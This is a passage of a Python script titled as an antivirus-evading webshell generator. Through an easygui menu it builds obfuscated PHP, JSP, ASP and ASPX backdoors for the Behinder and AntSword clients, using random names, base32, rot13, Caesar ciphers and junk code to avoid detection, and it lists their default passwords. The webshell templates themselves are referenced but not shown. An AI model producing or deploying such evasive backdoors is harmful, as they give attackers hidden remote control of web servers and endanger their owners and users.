794 |     parameter0 = random_name(5)
795 |     parameter1 = random_name(5)
796 |     parameter2 = random_name(5)
797 |     parameter3 = random_name(5)
798 |     parameter4 = random_name(5)
799 |     rand = random_keys(7)
800 | 
801 |     shellc = asp_Behinder_2_shell.format(parameter0,parameter1,parameter2,parameter3,parameter4,rand)
802 |     return shellc
803 | 
804 | def build_asp_Behinder_3_shell():
805 |     parameter0 = random_name(5)
806 |     parameter1 = random_name(5)
807 |     parameter2 = random_name(5)
808 |     parameter3 = random_name(5)
809 |     parameter4 = random_name(5)
810 |     shellc = asp_Behinder_3_shell.format(parameter0,parameter1,parameter2,parameter3,parameter4)
811 |     return shellc
812 | #aspx蚁剑
813 | 
814 | def build_aspx_AntSword_func_shell():
815 |     parameter = random_name(4)
816 |     parameter1 = random_name(4)
817 |     FunctionName = random_name(4)
818 |     FunctionName1 = random_name(4)
819 |     parameter2 = random_name(4)
820 |     parameter3 = random_name(4)
821 |     lef = '''{'''
822 |     rig = '''}'''
823 |     shellc = aspx_AntSword_func_shell.format(parameter,parameter1,FunctionName,FunctionName1,parameter2,parameter3,lef,rig)
824 |     return shellc
825 | 
826 | #aspx冰蝎
827 | def build_aspx_Behinder_1_shell():
828 |     parameter0 = random_name(5)
829 |     parameter1 = random_name(5)
830 |     parameter2 = "/*"+random_keys(7)+"*/"
831 |     lef = '''{'''
832 |     rig = '''}'''
833 |     shellc = aspx_Behinder_1_shell.format(parameter0,parameter1,parameter2,lef,rig,parameter2)
834 |     return shellc
835 | 
836 | def build_aspx_Behinder_2_shell():
837 |     parameter0 = random_name(5)
838 |     parameter1 = random_name(5)
839 |     parameter2 = "/*"+random_keys(7)+"*/"
840 |     shellc = aspx_Behinder_2_shell.format(parameter0,parameter1,parameter2,parameter2)
841 |     return shellc
842 | 
843 | msg="请选择需要生成的脚本语言 注：冰蝎默认密码为rebeyond，蚁剑默认密码为zero，php蚁剑需要添加GET参数 pass=pureqh"
844 | msg1="请选择webshell客户端类型"
845 | title="免杀webshell生成器-by：pureqh"   #  标题
846 | choices=['php','jsp','asp','aspx']  # 先选择语言
847 | Type_choice=['Behinder','AntSword'] # 客户端类型                          
848 | choice=g.choicebox(msg,title,choices) #  在这里 choice 可以得到上面你选择的那个选项
849 | if choice =='php':
850 |     choice1=g.choicebox(msg1,title,Type_choice)
851 |     if choice1=='AntSword':
852 |         #蚁剑webshell
853 |         msg2="请选择webshell关键字加密类型,basex为随机换表base62编码处理关键字，base32类型为通过base32编码方式处理关键字，http类型为http请求的方式加载关键字，rot13类型为通过类加载和rot13加解密方式处理关键字，class类型通过类加载和垃圾代码填充处理关键字,kaisa+类型通过凯撒加密和http获取key处理关键字,后面两种为自定义加密加密关键字"
854 |         php_AntSword_shell_choice=['baseX','base32','http','rot13','class','kaisa+','myencry','myencry+class','AF']
855 |         choice2=g.choicebox(msg2,title,php_AntSword_shell_choice)
856 |         if  choice2=='baseX':
857 |             #base32加密关键字
858 |             g.msgbox(build_php_AntSword_baseX_shell(),'webshell')
859 |             sys.exit()
860 |         elif choice2=='base32':
861 |             #base32加密关键字
862 |             g.msgbox(build_php_AntSword_base32_shell(),'webshell')
863 |             sys.exit()
864 |         elif choice2=='http':
865 |             #http加载关键字
866 |             g.msgbox(build_php_AntSword_http_shell(),'webshell')
867 |             sys.exit()
868 |         elif choice2=='rot13':
869 |             #rot13
870 |             g.msgbox(build_php_AntSword_rot13_shell(),'webshell')
871 |             sys.exit()
872 |         elif choice2=='class':
873 |             #类加载加垃圾函数
874 |             g.msgbox(build_php_AntSword_class_shell(),'webshell')
875 |             sys.exit()
876 |         elif choice2=='kaisa+':
877 |             #凯撒+http
878 |             g.msgbox(build_php_AntSword_kaisa_shell(),'webshell')
879 |             sys.exit()
880 |         elif choice2=='myencry':
881 |             #自定义加密算法
882 |             g.msgbox(php_AntSword_myencry_shell,'webshell')
883 |             sys.exit()
884 |         elif choice2=='myencry+class':
885 |             #自定义加密算法
886 |             g.msgbox(php_AntSword_myencry_class_shell,'webshell')
887 |             sys.exit()
888 |         elif choice2=="AF":
889 |             #AF马
890 |             g.msgbox(php_AntSword_AF_shell,'webshell')
891 |             sys.exit()
892 |         else:
893 |             sys.exit()
894 |     elif choice1=='Behinder' :
895 |         #冰蝎webshell
896 |         msg3="选项1为关键语句加密关键字分离，选项2为关键字关键函数分离"
897 |         php_Behinder_shell_choice=['1','2']
898 |         choice3=g.choicebox(msg3,title,php_Behinder_shell_choice)
899 |         if choice3=='1':
900 |             #build_php_Behinder_1_shell
901 |             g.msgbox(build_php_Behinder_1_shell(),'webshell')
902 |             sys.exit()
903 |         elif choice3=='2':
904 |             #build_php_Behinder_2_shell
905 |             g.msgbox(build_php_Behinder_2_shell(),'webshell')
906 |             sys.exit()
907 |         else:
908 |             sys.exit()
909 |     else:
910 |         sys.exit()
911 |         
912 |     
913 | elif choice == 'jsp':
914 | #jsp
915 |     # 选择支持冰蝎或蚁剑
916 |     choice4=g.choicebox(msg1,title,Type_choice)
917 |     if choice4=='AntSword':
918 |         #蚁剑webshell
919 |         g.msgbox(build_jsp_AntSword_uncode_shell(),'webshell')
920 |         sys.exit()
921 |     
922 |     elif choice4=='Behinder':
923 |         #冰蝎webshell
924 |         g.msgbox(build_jsp_Behinder_uncode_shell(),'webshell')
925 |         sys.exit()
926 |     else:
927 |         sys.exit()
928 | 
929 | elif choice == 'asp':
930 | #asp
931 |     choice5=g.choicebox(msg1,title,Type_choice)
932 |     if choice5=='AntSword':
933 |         #蚁剑webshell
934 |         msg6="选项1为函数分割，选项2为类加载，选项3为关键字加解密"
935 |         asp_AntSword_shell_choice=['1','2','3']
936 |         choice8=g.choicebox(msg6,title,asp_AntSword_shell_choice)
937 |         if choice8=='1':
938 |             g.msgbox(build_asp_AntSword_func_shell(),'webshell')
939 |             sys.exit()
940 |         elif choice8=='2':
941 |             g.msgbox(build_asp_AntSword_class_shell(),'webshell')
942 |             sys.exit()
943 |         elif choice8=='3':
944 |             g.msgbox(build_asp_AntSword_enc_shell(),'webshell')
945 |             sys.exit()
946 |         else:
947 |             sys.exit()
948 |     
949 |     elif choice5=='Behinder':
950 |         #冰蝎webshell
951 |         msg4="选项1为关键语句分离、多次异或，选项2为关键字关键语句分离，选项3为注释分割正则"
952 |         asp_Behinder_shell_choice=['1','2','3']
953 |         choice6=g.choicebox(msg4,title,asp_Behinder_shell_choice)
954 |         if choice6=='1':
955 | 
956 |             g.msgbox(build_asp_Behinder_1_shell(),'webshell')
957 |             sys.exit()
958 |         elif choice6=='2':
959 |             g.msgbox(build_asp_Behinder_2_shell(),'webshell')
960 |             sys.exit()
961 |         elif choice6=='3':
962 |             g.msgbox(build_asp_Behinder_3_shell(),'webshell')
963 |             sys.exit()
964 |         else:
965 |             sys.exit()
966 |     else:
967 |         sys.exit()
968 | 
969 | elif choice == 'aspx':
970 | #aspx
971 |     choice7=g.choicebox(msg1,title,Type_choice)
972 |     if choice7=='AntSword':
973 |         #蚁剑webshell
974 |         g.msgbox(build_aspx_AntSword_func_shell(),'webshell')
975 |         sys.exit()
976 |     
977 |     elif choice7=='Behinder':
978 |         #冰蝎webshell
979 |         msg5="选项1为关键字分离及替换，选项2为关键字分离"
980 |         aspx_Behinder_shell_choice=['1','2']
981 |         choice7=g.choicebox(msg5,title,aspx_Behinder_shell_choice)
982 |         if choice7=='1':
983 | 
984 |             g.msgbox(build_aspx_Behinder_1_shell(),'webshell')
985 |             sys.exit()
986 |         elif choice7=='2':
987 |             g.msgbox(build_aspx_Behinder_2_shell(),'webshell')
988 |             sys.exit()
989 |         else:
990 |             sys.exit()
991 |     else:
992 |         sys.exit()
993 | else :
994 |     sys.exit()


--------------------------------------------------------------------------------